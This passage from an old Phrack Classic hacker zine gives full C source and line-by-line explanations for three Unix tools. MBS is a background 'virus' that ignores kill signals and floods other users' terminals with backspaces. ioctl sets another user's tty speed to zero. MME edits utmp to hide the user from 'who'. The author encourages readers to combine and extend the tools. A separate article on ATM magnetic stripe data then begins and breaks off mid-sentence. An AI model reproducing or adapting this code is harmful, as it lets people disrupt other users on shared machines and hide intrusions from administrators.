itself. However, it does "infect" every user that logs in, provided
|
|
the conditions are right.
|
|
|
|
The MBS virus uses the utmp reader to constantly read the utmp
|
|
file to find its next victim. Thus, eventually getting everyone, then
|
|
recycling to start again. Therefore catching people who login after
|
|
it is started.
|
|
|
|
Lets look at the source:
|
|
|
|
- - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -
|
|
|
|
#include <stdio.h>
|
|
#include <sys/types.h>
|
|
#include <utmp.h>
|
|
#include <fcntl.h>
|
|
#include <signal.h>
|
|
/*
|
|
MBS - Mass BackSpace Virus!! v2.2 Deluxe+
|
|
(c) 1990 - Sir Hackalot
|
|
PhaZeSOFT Ltd.
|
|
|
|
*/
|
|
|
|
char *ent[10][100]; /* This supports 10 immune people change 10 to x for more */
|
|
int maxitem = 5; /* Should be total # of immune dudes */
|
|
int truefalse = 0;
|
|
int warn[10],bad;
|
|
char full_tty[15], text[160], kstr[80];
|
|
FILE *to_tty, *strm;
|
|
struct utmp u;
|
|
|
|
|
|
void kmes(fmt,boo)
|
|
char *fmt;
|
|
int boo;
|
|
{
|
|
if (boo != 0) {
|
|
printf("MBS_KERN: ");
|
|
printf("%s",fmt);
|
|
}
|
|
if (boo == 0) {
|
|
sprintf(full_tty,"/dev/%s",u.ut_line);
|
|
to_tty = fopen(full_tty,"w");
|
|
fprintf(to_tty,"MBS_KERN: %s",fmt);
|
|
fclose(to_tty);
|
|
}
|
|
}
|
|
|
|
void initit() { /* Initialize our little "kernel" */
|
|
int xxx = 0;
|
|
strcpy(ent[0],"technic");
|
|
strcpy(ent[1],"merlin");
|
|
strcpy(ent[2],"datawiz");
|
|
strcpy(ent[3],"par");
|
|
strcpy(ent[4],"Epsilon");
|
|
while (xxx < 11) {
|
|
warn[xxx] = 0;
|
|
xxx++;
|
|
}
|
|
kmes("Kernel Started.\n",1);
|
|
}
|
|
|
|
void warnem(wcnt) /* Notify all the immune people ... */
|
|
int wcnt;
|
|
{
|
|
if (bad == 0) { /* keep from dumping core to disk */
|
|
if (warn[wcnt] < 2) {
|
|
sprintf(kstr,"%s has started a backspace virus!\n",getlo
|
|
kmes(kstr,0);
|
|
warn[wcnt]++;
|
|
}
|
|
}
|
|
}
|
|
|
|
|
|
int checkent(uname) /* Check for immunity */
|
|
char *uname;
|
|
{
|
|
int cnt = 0;
|
|
truefalse = 0; /* assume NOT immune */
|
|
while (cnt < maxitem) {
|
|
if (strcmp(uname,ent[cnt]) == 0) { /* if immune... */
|
|
truefalse = 1;
|
|
warn[cnt]++; /* increment warning variable */
|
|
warnem(cnt); /* warn him if we have not */
|
|
}
|
|
|
|
cnt++;
|
|
}
|
|
return(truefalse); /* return immunity stat. 1=immune, 0 = not */
|
|
}
|
|
|
|
|
|
/* Purpose: Instead of just ignoring the signal via SIG_IGN, we want
|
|
to intercept it, and notify use */
|
|
void sig_hand(sig)
|
|
int sig;
|
|
{
|
|
if(sig == 3) kmes("Ignoring Interrupt\n",1);
|
|
if(sig == 15) kmes("Ignoring Termination Signal\n",1);
|
|
if(sig == 4) kmes("Ignoring quit signal.\n",1);
|
|
}
|
|
|
|
main(argc,argv)
|
|
int argc;
|
|
char *argv[];
|
|
|
|
{
|
|
int prio,pid,isg,handle;
|
|
char buf[80];
|
|
char name[20],tty[20],time[20];
|
|
initit();
|
|
if (argc < 2) prio = 20;
|
|
if (argc == 2) prio = atoi(argv[1]);
|
|
if ((pid = fork()) > 0) {
|
|
printf("Welcome to MBS 2.2 Deluxe, By Sir Hackalot [PHAZE]\n");
|
|
printf("Another Fine PhaZeSOFT production\n");
|
|
printf("Thanks to The DataWizard for Testing this\n");
|
|
printf("Hello to The Conflict\n");
|
|
sprintf(kstr,"Created Process %s (%d)\n\n",argv[0],pid);
|
|
kmes(kstr,1);
|
|
exit(0); /* KILL MOTHER PID, return to Shell & go background */
|
|
}
|
|
nice(prio);
|
|
signal(SIGQUIT,sig_hand);
|
|
signal(SIGINT,sig_hand);
|
|
signal(SIGTERM,sig_hand);
|
|
/* That makes sure you HAVE to do a -9 or -10 to kill this thing.
|
|
Sometimes, hitting control-c will kill of background processes!
|
|
Add this line if you want it to continue after you hangup:
|
|
signal(SIGHUP,SIG_IGN);
|
|
doing it will have the same effect as using NOHUP to
|
|
to execute it. Get it? Nohup = no SIGHUP
|
|
*/
|
|
while(1) { /* "Kernel" Begins here and never ends */
|
|
handle = open("/etc/utmp",O_RDONLY);
|
|
while (read(handle,&u,sizeof(u)) != 0) {
|
|
bad = 0;
|
|
sprintf(full_tty,"/dev/%s",u.ut_line);
|
|
if (strcmp(u.ut_name,getlogin()) != 0) {
|
|
|
|
/* Fix: Below is a line that optimizes the hosing/immune process
|
|
It skips the utmp entry if it is not a user. If it is, it
|
|
checks for immunity, then comes back. This is alot faster
|
|
and does not wear down cpu time/power */
|
|
|
|
if (u.ut_type == USER_PROCESS) isg = checkent(u.ut_name);
|
|
else isg = 1;
|
|
if (isg != 1) {
|
|
if((to_tty = fopen(full_tty,"w")) == NUL
|
|
bad = 1;
|
|
}
|
|
if (bad == 0) {
|
|
fprintf (to_tty, "\b\b\b");
|
|
fflush (to_tty);
|
|
}
|
|
fclose(to_tty);
|
|
}
|
|
}
|
|
}
|
|
close (handle);
|
|
}
|
|
}
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
I am going to try to take this bit by bit and explain how it works
|
|
so that maybe you can come up with some good ideas on creating
|
|
something similar.
|
|
|
|
I will start with the MAIN function. Here it is:
|
|
|
|
___
|
|
|
|
main(argc,argv)
|
|
int argc;
|
|
char *argv[];
|
|
|
|
{
|
|
int prio,pid,isg,handle;
|
|
char buf[80];
|
|
char name[20],tty[20],time[20];
|
|
initit();
|
|
___
|
|
|
|
Obviously, this is the part of the code which initializes the main
|
|
variables used. The "main(argc,argv)" is there so it can accept
|
|
command line parameters. The command line parameters are just
|
|
for speed customization, which I will discuss later. Notice how
|
|
the variables are defined for the command line parameters:
|
|
|
|
int argc, char *argv[];
|
|
|
|
argc is the number of arguments, INCLUDING the name of the current
|
|
executable running. argv[] holds the strings in an array which make
|
|
up the parameters passed. argv[0] holds the name of the program,
|
|
while argv[1] holds the 1st parameter entered on the command line.
|
|
initit() is called to set up the necessary tables. All of
|
|
the variables defined at the top of the program are global, and alot
|
|
of these functions use the global variables, as does initit();.
|
|
|
|
___
|
|
|
|
if (argc < 2) prio = 20;
|
|
if (argc == 2) prio = atoi(argv[1]);
|
|
___
|
|
|
|
Ok, the above two lines essentially parse the command line.
|
|
The MBS program only accepts ONE argument, which is the priority
|
|
value to add to the normal process priority. This is so you
|
|
can customize how fast MBS runs. If you want to burn CPU time,
|
|
you would invoke mbs by:
|
|
$ mbs 0
|
|
|
|
That would make the priority as fast as the current can run something.
|
|
MBS's default priority setting is 20, so that CPU time will be saved.
|
|
MBS is very fast however, and since alot of Unix systems like to
|
|
cache alot of frequently used data from disks, it gets fast after
|
|
it reads utmp a few times, since utmp will be cached until it changes.
|
|
However, you can run MBS with a number from 0-19, the higher the
|
|
number, the "less" priority it will have with the cpu.
|
|
|
|
|
|
___
|
|
|
|
if ((pid = fork()) > 0) {
|
|
printf("Welcome to MBS 2.2 Deluxe, By Sir Hackalot [PHAZE]\n");
|
|
printf("Another Fine PhaZeSOFT production\n");
|
|
sprintf(kstr,"Created Process %s (%d)\n\n",argv[0],pid);
|
|
kmes(kstr,1);
|
|
exit(0); /* KILL MOTHER PID, return to Shell & go background */
|
|
}
|
|
|
|
___
|
|
|
|
The above is what sends MBS into the background. It calls fork(),
|
|
which creates another process off the old one. However, fork()
|
|
can be considered "cloning" a process, since it will use anything
|
|
beneath it. So, now you can assume there are TWO copies of MBS
|
|
running -- One in the foreground, and one in the background. However,
|
|
you may notice the exit(0). That first exit kills off the parent.
|
|
a second call to exit() would kill the child as well. notice the
|
|
call to "kmes". kmes is just a function that is defined earlier,
|
|
which I will discuss later.
|
|
___
|
|
|
|
nice(prio);
|
|
signal(SIGQUIT,sig_hand);
|
|
signal(SIGINT,sig_hand);
|
|
signal(SIGTERM,sig_hand);
|
|
/* signal(SIGHUP,SIG_IGN); */
|
|
___
|
|
|
|
The above code is integral for the survival of the MBS program in
|
|
memory. The nice(prio) is what sets the new priority determined
|
|
by the command line parsing.
|
|
|
|
The signal() statements are basically what keeps MBS running. What
|
|
it does is catch INTERRUPTS, Quits, and a regular call to KILL.
|
|
the commented out portion would ignore requests to kill upon hangup.
|
|
This would keep MBS in the background after you logged off.
|
|
|
|
Why do this? Well, remember that the parent was affected by
|
|
its environment? Well, the new forked process is too. That means,
|
|
if you were 'cat'ting a file, and hit control-C to stop it, the
|
|
cat process would stop, but push the signal on to MBS, which would
|
|
cause MBS to exit, if it did not have a signal handler. The signal
|
|
calls setup signal handlers. What they do is tell the program
|
|
to goto the function sig_hand() when one of the 3 signals is
|
|
encountered. The commented signal just tells the program to ignore
|
|
the hangup signal. The sig_hand argument can be replaced with
|
|
SIG_IGN if you just want to plain ignore the signal and not handle it.
|
|
|
|
The SIGQUIT is sometimes the control-D character. That is why it
|
|
also must be dealt with. If the signals aren't ignored or caught,
|
|
MBS can easily kicked out of memory by YOU, by accident of course.
|
|
|
|
___
|
|
|
|
while(1) { /* "Kernel" Begins here and never ends */
|
|
handle = open("/etc/utmp",O_RDONLY);
|
|
___
|
|
|
|
The above starts the main loop. The begining of the loop is to open
|
|
the utmp file.
|
|
|
|
___
|
|
|
|
while (read(handle,&u,sizeof(u)) != 0) {
|
|
bad = 0;
|
|
sprintf(full_tty,"/dev/%s",u.ut_line);
|
|
if (strcmp(u.ut_name,getlogin()) != 0) {
|
|
if (u.ut_type == USER_PROCESS) isg = checkent(u.ut_name);
|
|
else isg = 1;
|
|
if (isg != 1) {
|
|
if((to_tty = fopen(full_tty,"w")) == NULL) {
|
|
bad = 1;
|
|
}
|
|
if (bad == 0) {
|
|
fprintf (to_tty, "\b\b\b");
|
|
fflush (to_tty);
|
|
}
|
|
fclose(to_tty);
|
|
}
|
|
}
|
|
___
|
|
|
|
|
|
Above is the sub_main loop. what it does is go through the utmp
|
|
file, and on each entry, it prepares a path name to the TTY
|
|
of the current utmp entry (sprintf(fulltty...)). Then it checks
|
|
to see if it is YOU. If it is, the loop ends. If it is not, then
|
|
it sees if it is a User. If not, it ends the loop and goes to
|
|
the next.
|
|
|
|
If it is a user, it goes to checkent to see if that user has been
|
|
declared immune in the immunity tables (down below later..).
|
|
If the idiot is not immune, it attempts to open their tty. If it
|
|
cannot, it sets the bad flag, then ends the loop. If it can be
|
|
written to, it sends three backspaces, according to YOUR tty specs.
|
|
Then, it closes the opened tty, and the loop continues until the end.
|
|
|
|
___
|
|
|
|
}
|
|
close (handle);
|
|
}
|
|
}
|
|
|
|
___
|
|
|
|
The above is the end of the main loop. It closes handle (utmp) so
|
|
it can be reopened at the start of the loop at the beginning of the
|
|
file. The reason to not create a table of people to hit in memory
|
|
after one reading is so that MBS will stop after people logoff, and
|
|
to start when new ones logon. The constant reading of the utmp
|
|
file makes sure everyone gets hit, except immune people. Also,
|
|
the file must be closed before reopening, or else, after a few opens,
|
|
things will go to hell.
|
|
|
|
|
|
Here is the signal handler:
|
|
|
|
___
|
|
|
|
void sig_hand(sig)
|
|
int sig;
|
|
{
|
|
if(sig == 3) kmes("Ignoring Interrupt\n",1);
|
|
if(sig == 15) kmes("Ignoring Termination Signal\n",1);
|
|
if(sig == 4) kmes("Ignoring quit signal.\n",1);
|
|
}
|
|
___
|
|
|
|
It is very simple. when a signal is caught and sent to the handler,
|
|
the library function SIGNAL sends the signal number as an argument
|
|
to the function. The ones handled here are 3,4, and 15. But
|
|
this was just for effect. You could just have it print one line
|
|
no matter what the signal was, or just rip this function out and
|
|
put in SIG_IGN in the signal calls.
|
|
|
|
Below is the immunity check:
|
|
___
|
|
|
|
int checkent(uname) /* Check for immunity */
|
|
char *uname;
|
|
{
|
|
int cnt = 0;
|
|
truefalse = 0; /* assume NOT immune */
|
|
while (cnt < maxitem) {
|
|
if (strcmp(uname,ent[cnt]) == 0) { /* if immune... */
|
|
truefalse = 1;
|
|
warn[cnt]++; /* increment warning variable */
|
|
warnem(cnt); /* warn him if we have not */
|
|
}
|
|
|
|
cnt++;
|
|
}
|
|
return(truefalse); /* return immunity stat. 1=immune, 0 = not */
|
|
}
|
|
|
|
___
|
|
|
|
Above, you see variables used that are not defined. They are
|
|
just variables that were declared as globals at the begining.
|
|
What this does is just compare the login name sent to it with
|
|
every name in the immunity table. If it finds the name on
|
|
the table matches, it will go and see if it should warn the
|
|
user. Also, the warn count is incremented so that the warning
|
|
function will know if the user has been warned.
|
|
|
|
Here is the warning function:
|
|
|
|
___
|
|
|
|
void warnem(wcnt) /* Notify all the immune people ... */
|
|
int wcnt;
|
|
{
|
|
if (bad == 0) { /* keep from dumping core to disk */
|
|
if (warn[wcnt] < 2) {
|
|
sprintf(kstr,"%s has started a backspace virus!\n",getlo
|
|
kmes(kstr,0);
|
|
warn[wcnt]++;
|
|
}
|
|
}
|
|
}
|
|
___
|
|
|
|
What this does is take the position number of the table entry and
|
|
checks and see if that entry has been warned before. It decides
|
|
this by checking its value. If it is less than two, that means
|
|
the user had not been warned. After it is sent, the function
|
|
incrememnts the warning flag so that they will never been warned
|
|
again until the program has stopped & restarted or someone else
|
|
runs one. The "if (bad == 0)" is there so that it only warns a
|
|
person if it can write to the tty.
|
|
|
|
Here is the kmes function you keep seeing:
|
|
|
|
___
|
|
|
|
void kmes(fmt,boo)
|
|
char *fmt;
|
|
int boo;
|
|
{
|
|
if (boo != 0) {
|
|
printf("MBS_KERN: ");
|
|
printf("%s",fmt);
|
|
}
|
|
if (boo == 0) {
|
|
sprintf(full_tty,"/dev/%s",u.ut_line);
|
|
to_tty = fopen(full_tty,"w");
|
|
fprintf(to_tty,"MBS_KERN: %s",fmt);
|
|
fclose(to_tty);
|
|
}
|
|
}
|
|
___
|
|
All this is, is a fancy printf which prints a string with
|
|
"MBS_KERN:" stuck on the front of it. the BOO variable is just
|
|
so it can determine whether or not to send it to the local
|
|
screen or to another tty. It is just for looks.
|
|
|
|
Now, finally, we can look at the initializer:
|
|
|
|
___
|
|
|
|
void initit() { /* Initialize our little "kernel" */
|
|
int xxx = 0;
|
|
strcpy(ent[0],"sirh");
|
|
strcpy(ent[1],"merlin");
|
|
strcpy(ent[2],"datawiz");
|
|
strcpy(ent[3],"par");
|
|
strcpy(ent[4],"epsilon");
|
|
while (xxx < 11) {
|
|
warn[xxx] = 0;
|
|
xxx++;
|
|
}
|
|
kmes("Kernel Started.\n",1);
|
|
}
|
|
___
|
|
|
|
This is a very SIMPLE procedure. It just fills the list
|
|
with the people to keep immune. ent[..][..] is what holds
|
|
the immune list. It also zeros out the warning flags associated
|
|
with each user. ("sirh","merlin","par",etc. are acct. names)
|
|
|
|
This "virus" can do more than just send backspaces if you want it
|
|
to, but it will take modification. Some people have modified
|
|
it to include the next program, which is ioctl.c.
|
|
|
|
_______________________________________________________________________________
|
|
|
|
|
|
|
|
o IOCTL -- Set another's tty w/out read perms
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
|
|
The program ioctl is very very nice. What it does is basically
|
|
act like stty, but you don't have to use the < to change
|
|
someone else's terminal. Here is the listing:
|
|
|
|
- - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -
|
|
|
|
#include <stdio.h>
|
|
#include <sys/types.h>
|
|
#include <fcntl.h>
|
|
#include <sgtty.h>
|
|
#define TIOC ('T'<<8)
|
|
#define TCSETA (TIOC|2)
|
|
|
|
main(argc,argv)
|
|
int argc;
|
|
char *argv[];
|
|
{
|
|
int x;
|
|
struct sgttyb histty;
|
|
if (argc == 1) exit(0);
|
|
x = open(argv[1],O_WRONLY);
|
|
if (x == -1) exit(0);
|
|
histty.sg_ispeed = B0;
|
|
histty.sg_ospeed = B0;
|
|
ioctl(x,TCSETA,&histty);
|
|
}
|
|
|
|
- - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -
|
|
|
|
The basis of the program is that you give a full path to the tty
|
|
to nail. You need to be able to write to the tty for it to work.
|
|
|
|
Notice the two defines. They are in there so you do not have
|
|
to include termio.h, and hence get 200 warnings of redefinition.
|
|
This program is WAY simpler than MBS, but here is how it works:
|
|
|
|
___
|
|
|
|
main(argc,argv)
|
|
int argc;
|
|
char *argv[];
|
|
___
|
|
|
|
Of course, the above sets up the program to get command line
|
|
arguments.
|
|
|
|
___
|
|
|
|
int x;
|
|
struct sgttyb histty;
|
|
___
|
|
|
|
These are the variables. the sgttyb structure is what the ioctl
|
|
function call needs to do its duty. You can do a lot to a tty
|
|
using the structure, but this program only does 2 things to the
|
|
tty, as you shall soon see. Remember that the programs here can
|
|
be modified, especially this one. Just check out sgtty.h to
|
|
see the modes you can pop a tty into.
|
|
|
|
___
|
|
|
|
if (argc == 1) exit(0);
|
|
x = open(argv[1],O_WRONLY);
|
|
if (x == -1) exit(0);
|
|
___
|
|
|
|
The above three lines are the open/error checks. The 1st line
|
|
says that if the idiot did not give an argument then exit
|
|
the program. The argument needs to be the path to the
|
|
device driver (/dev/tty...).
|
|
The second line opens the tty for writing, and the third exits
|
|
upon error.
|
|
|
|
___
|
|
|
|
histty.sg_ispeed = B0;
|
|
histty.sg_ospeed = B0;
|
|
ioctl(x,TCSETA,&histty);
|
|
___
|
|
|
|
The above three lines are the meat of the program. What they
|
|
do is this:
|
|
|
|
Line 1 sets the input speed to 0 for the tty into the structure.
|
|
line 2 sets the output speed to 0 for the tty into the structure.
|
|
line 3 sets the tty according to the structure histty.
|
|
|
|
That is why if you look into the components of the structure, you can
|
|
do things, such as convert all output to uppercase for them,
|
|
set a higher baud, redefine CR mapping, redefine tabs, and
|
|
all sorts of things.
|
|
|
|
_______________________________________________________________________________
|
|
|
|
|
|
o MME - Make ME!:
|
|
~~~~~~~~~~~~~~~
|
|
MME is just a program which changes utmp for you, in order to hide
|
|
you, or just mess with other user's minds. This is a different
|
|
version then the one I originally put out. In this version,
|
|
I removed the code that lets you change your tty. It just became
|
|
too dangerous to change your tty.
|
|
|
|
Here is the listing:
|
|
|
|
- - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -
|
|
|
|
#include <stdio.h>
|
|
#include <fcntl.h>
|
|
#include <sys/types.h>
|
|
#include <utmp.h>
|
|
#include <sys/stat.h>
|
|
|
|
char *mytty; /* For an exact match of ut_line */
|
|
char *backup_utmp = "cp /etc/utmp /tmp/utmp.bak";
|
|
struct utmp *user;
|
|
|
|
main(argc,argv)
|
|
int argc;
|
|
char *argv[];
|
|
{
|
|
int good= 0,cnt = 0,start = 1, index = 0;
|
|
char err[80];
|
|
system(backup_utmp);
|
|
printf("Welcome to MME 1.00 By Sir Hackalot\n");
|
|
printf("Another PHAZESOFT Production\n");
|
|
printf("Status:");
|
|
if (argc == 2) printf("Changing your login to %s\n",argv[1]);
|
|
if (argc == 1) printf("Removing you from utmp\n");
|
|
|
|
utmpname("/etc/utmp");
|
|
mytty = strrchr(ttyname(0),'/'); /* Goto the last "/" */
|
|
strcpy(mytty,++mytty); /* Make a string starting one pos greater */
|
|
while (good != 1) {
|
|
user = getutent();
|
|
cnt++;
|
|
if (strcmp(user->ut_line,mytty) == 0) good =1;
|
|
}
|
|
utmpname("/etc/utmp"); /* Reset file pointer */
|
|
for(start = 0;start < cnt;start++) {
|
|
user = getutent(); /* Move the file pointer to where we are */
|
|
}
|
|
|
|
|
|
if (argc == 1) {
|
|
user->ut_type = LOGIN_PROCESS;
|
|
strcpy(user->ut_name,"LOGIN");
|
|
}
|
|
else user->ut_type = USER_PROCESS;
|
|
|
|
if (argc == 2) strcpy(user->ut_name,argv[1]);
|
|
pututline(user); /* Rewrite our new info */
|
|
endutent(); /* Tell the utmp functions we are through */
|
|
printf("Delete /tmp/utmp.bak if all is well.\n");
|
|
printf("Else, copy it to /etc/utmp.\n");
|
|
}
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
|
|
Well, of course, we will take this bit by bit.
|
|
Lets start with the standard ole function:
|
|
|
|
___
|
|
|
|
main(argc,argv)
|
|
int argc;
|
|
char *argv[];
|
|
___
|
|
|
|
This again sets up main so we can accept command line arguments.
|
|
|
|
___
|
|
|
|
char *mytty; /* For an exact match of ut_line */
|
|
char *backup_utmp = "cp /etc/utmp /tmp/utmp.bak";
|
|
struct utmp *user;
|
|
___
|
|
|
|
These are just global variables.
|
|
Backup_utmp is the command we will issue to shell for a failsafe
|
|
mechanism.
|
|
|
|
___
|
|
|
|
system(backup_utmp);
|
|
printf("Welcome to MME 1.00 By Sir Hackalot\n");
|
|
printf("Another PHAZESOFT Production\n");
|
|
printf("Status:");
|
|
if (argc >= 2) printf("Changing your login to %s\n",argv[1]);
|
|
if (argc == 1) printf("Removing you from utmp\n");
|
|
___
|
|
|
|
The above is not hard to figure out. First, this uses the system
|
|
command to load shell, and execute our backup command.
|
|
Then, the lame credits are printed. Then, it tells you what it
|
|
is going to do based on the number of arguments passed from the
|
|
command line.
|
|
If no arguments are given (argc==1) then remove us from utmp.
|
|
If there are 1 or more (arc>=2) then change the login name.
|
|
|
|
___
|
|
|
|
utmpname("/etc/utmp");
|
|
mytty = strrchr(ttyname(0),'/'); /* Goto the last "/" */
|
|
strcpy(mytty,++mytty); /* Make a string starting one pos greater */
|
|
___
|
|
|
|
The above code does the following: utmpname is a system function
|
|
common to UNIX system V, XENIX system V, etc. It is part of the
|
|
utmp reading library. It sets the thing to be read when the
|
|
other system calls are made (getutent, etc..).
|
|
mytty is set to hold one's tty. It has to break down the result
|
|
of ttyname(0) to get a ttyname without a path.
|
|
|
|
___
|
|
|
|
while (good != 1) {
|
|
user = getutent();
|
|
cnt++;
|
|
if (strcmp(user->ut_line,mytty) == 0) good =1;
|
|
}
|
|
___
|
|
|
|
|
|
This code gets your relative index from utmp and stores it into
|
|
cnt.
|
|
|
|
___
|
|
|
|
utmpname("/etc/utmp"); /* Reset file pointer */
|
|
for(start = 0;start < cnt;start++) {
|
|
user = getutent(); /* Move the file pointer to where we are */
|
|
}
|
|
___
|
|
|
|
The above resets the file pointer used by the system calls, then
|
|
moves to your entry.
|
|
|
|
___
|
|
|
|
if (argc == 1) {
|
|
user->ut_type = LOGIN_PROCESS;
|
|
strcpy(user->ut_name,"LOGIN");
|
|
}
|
|
else user->ut_type = USER_PROCESS;
|
|
|
|
if (argc == 2) strcpy(user->ut_name,argv[1]);
|
|
pututline(user); /* Rewrite our new info */
|
|
endutent(); /* Tell the utmp functions we are through */
|
|
___
|
|
|
|
The above is very simple as well. If you are removing yourself
|
|
from utmp, it will change your process type to LOGIN_PROCESS
|
|
so that when someone does a "who", you are not there.
|
|
It changes your login name to LOGIN so if some knowitall
|
|
system admin does a who -l, he wont see you. See, who -l shows
|
|
ttys waiting for login. SO, if i did not change your tty name,
|
|
we would see:
|
|
|
|
$ who -l
|
|
LOGIN ttyxx1
|
|
LOGIN tty002
|
|
joehack tty003
|
|
LOGIN tty004
|
|
|
|
See the problem there? That is why your name needs to be
|
|
changed to LOGIN.
|
|
If you are changing your login name, the "else" statment kicks
|
|
in and makes SURE you WILL show up in utmp, in case you had
|
|
removed yourself before.
|
|
Then, it takes the command line argument, and places it as your
|
|
login name in utmp.
|
|
pututline(user) then writes the info into the record where the
|
|
file pointer is... and that is your record. It puts the contents
|
|
of the things in the "user" structure into the file. then, endutent
|
|
closes the file.
|
|
|
|
Now, here is an example of using the file:
|
|
|
|
# mme Gh0d
|
|
|
|
that would change your login name to Gh0d in utmp.
|
|
|
|
# mme
|
|
|
|
that would remove you from sight. Remember!!: You need write perms
|
|
to utmp for this to work. You CAN test this program by changing
|
|
the filename in the function "utmpname" to somewhere else, say in
|
|
/tmp. You could copy /etc/utmp to /tmp/utmp, and test it there.
|
|
Then, you could use "who" to read the file in /tmp to show the
|
|
results.
|
|
|
|
_______________________________________________________________________________
|
|
|
|
|
|
o In Conclusion:
|
|
~~~~~~~~~~~~~~
|
|
|
|
These are just some of the programs I decided to put in this file.
|
|
I have a lot more, but I decided I would keep them for later
|
|
issues, and leave these two together since they can
|
|
be easily related. One person took MBS, and ioctl, and mended
|
|
them together to make a program that sets everyone's baud
|
|
rate to zero instead of sending 3 backspaces. They just put
|
|
in the above lines of code into the place where they sent
|
|
the backspaces, and used open instead of stream open (fopen).
|
|
It is very simple to mend these two things together.
|
|
|
|
Have a nice life! Keep on programmin'!
|
|
|
|
By: Sir Hackalot of Phaze.
|
|
_______________________________________________________________________________
|
|
|
|
==Phrack Classic==
|
|
|
|
Volume Three, Issue 32, File #6 of 12
|
|
|
|
+----------------------------------+
|
|
] Exploration of: ]
|
|
] Automatic Teller Machine Cards ]
|
|
] ]
|
|
+----+-------------------------+---+
|
|
] Written by: ]
|
|
] Jester Sluggo ]
|
|
] ]
|
|
] Released: May 13, 1989 ]
|
|
](to Black-Ice:For Review)]
|
|
] Released: Jan 12, 1990 ]
|
|
] (to Phrack Inc.) ]
|
|
] Released: Nov, 10, 1990 ]
|
|
] (to Phrack Classic) ]
|
|
+-------------------------+
|
|
|
|
|
|
With the North American continent the being the worlds biggest
|
|
consumer of goods and services liquidity of the banking system has
|
|
become an important factor in our everyday lives. Savings accounts
|
|
were used by people to keep money safe and used by the banks to
|
|
provide money for loans. However, due to 'Bankers Hours' (10 AM to
|
|
3 PM) it was often difficult for people to get access to thier
|
|
money when they needed it.
|
|
|
|
The banking system then created the Checking Account system. This
|
|
system allowed people to have much easier access to thier money.
|
|
Unfortunately the biggest drawback of this system is that people can
|
|
not manage thier own money and accounting procedures. Millions of
|
|
times each day throughout the North American continent people are
|
|
writing checks for more money than they have in thier savings accounts.
|
|
This drawback also causes the already-backed up judicial system to
|
|
become backed up further. The banking system soon reacted to this
|
|
problem by producing 'check verification' methods to prevent people
|
|
from forgery, and overdrawing from thier accounts.
|
|
|
|
"Money makes the world go 'round" and there are many different ways
|
|
to make this world spin. Today we have checking accounts, credit
|
|
cards, travelers checks, and the most 'liquid' form of money: cash.
|
|
Cash transactions are untrackable and widely accepted, so I feel
|
|
the "Paperless Society" will never happen. Automated Teller Machines
|
|
provide consumers with 24-hour access to cash-sources. By simply
|
|
inserting a plastic card into the machine and keypadding-in the
|
|
owners' "account password", you can access the owners bank account
|
|
and receive cash in-hand. This file will explain some details of
|
|
the automated tellers and the plastic card used by the Teller-system.
|
|
|
|
The automated teller is connected by wires and cables to a "Main
|
|
Computer". During each transaction the teller sends signals to
|
|
the main computer. The main computer records each transaction
|
|
(a deposit or withdrawl) and updates the card-holders account.
|
|
It also sends 'approval' or 'denial' signals to the ATM in regard
|
|
to the transaction requested. If a card-holder attempts to withdraw
|
|
$150.00 from his account and he has only $100.00 in it, the main
|
|
computer will tell the ATM to deny the transaction.
|
|
|
|
The ATM has 2 compartments to store cash in. The first is the "deposits"
|
|
compartment. This is a small area that receives the daily deposits.
|
|
It is located in the upper-part of the machine, near all the mechanical
|
|
devices. However, because most ATM transactions are withdrawls the
|
|
complete bottom-half is filled with cash where the withdrawls are
|
|
extracted from.
|
|
|
|
The plastic card inserted into the machine is the same size as a
|
|
credit card. The front of the card is embossed with information
|
|
about the card-holder. The back-side of the card has a thin strip
|
|
of magnetic tape which also holds some important information.
|
|
|
|
+--------------------------+ +--------------------------+
|
|
] CIRRUS ] ]--------------------------]
|
|
] INSTANT CASH CARD ] ]/////(magnetic strip)/////]
|
|
] ] ]--------------------------]
|
|
] Acct: 12345675 Exp. ] ] ]
|
|
] Joe Schmoe 01/91 ] ] "card-holders signature" ]
|
|
] ] ] ]
|
|
+--------------------------+ +--------------------------+
|
|
Front-side Back-side
|
|
|
|
When a cardholder inserts his card into the machine and requests a
|
|
transaction, the machine reads the embossed information from the
|
|
front-side and compares it with the data stored on the magnetic
|
|
strip; looking for a 'match' of the information on both sides.
|
|
|
|
The information on the front-side is easily readable with your
|
|
eyes. However, you can not read the data on the magnetic-strip
|
|
so easily. You may ask , "What is stored on the magnetic strip ?".
|
|
The answer is; the same information as the embossing plus some
|
|
'confidential' information regarding the cardholders' financial
|
|
status is stored there. The magnetic strip has 3 "tracks" on it.
|
|
The first track can store 210 BPI (Bytes per inch), and the second
|
|
stores 75 BPI, and the third stores 210 BPI. So, we have:
|
|
|
|
+---------------------------+
|
|
Track 1: (210 BPI density)
|
|
+---------------------------+
|
|
Track 2: ( 75 BPI density)
|
|
+---------------------------+
|
|
Track 3: (210 BPI density)
|
|
+---------------------------+
|
|
|
|
THE MAGNETIC STRIP
|
|
|
|
|
|
Now, here's the information stored on each track of the strip in
|
|
my example:
|
|
|
|
Track 1: " ;B 12345675 ^ Schmoe/Joe ^ ; LRC "
|
|
Track 2: " ;12345675 01/91 ^ 1234 ^ (discriminate data) ; LRC "
|
|
Track 3: " ;12345675 ^ 01/91 ^ 5 (discriminate data) ; LRC "
|
|
|
|
Here's the decoding of the above information:
|
|
Track 1: ";" = Beginning of the data character
|
|
"B" = Field-Control Character: I believe this character
|
|
tells the ATM what type of account (or status)
|
|
the user has.
|
|
"12345675" = This is the account number of the cardholder.
|
|
"^" = Data-field seperator.
|
|
"Schmoe/Joe" = Last/First name of cardholder.
|
|
"^" = Data-field seperator.
|
|
";" = End of data character.
|
|
"LRC" = Longitude Redundancy Check (end of track character).
|
|
|
|
Track 2: ";" = Beginning of data character
|
|
"12345675" = Account number of the cardholder.
|
|
"01/91" = Month/Year the card expires.
|
|
"^" = Data-field seperator.
|
|
"1234" = Process Identification Number (The cardholders 'password',
|
|
I think... or it could be a number to verify the
|
|
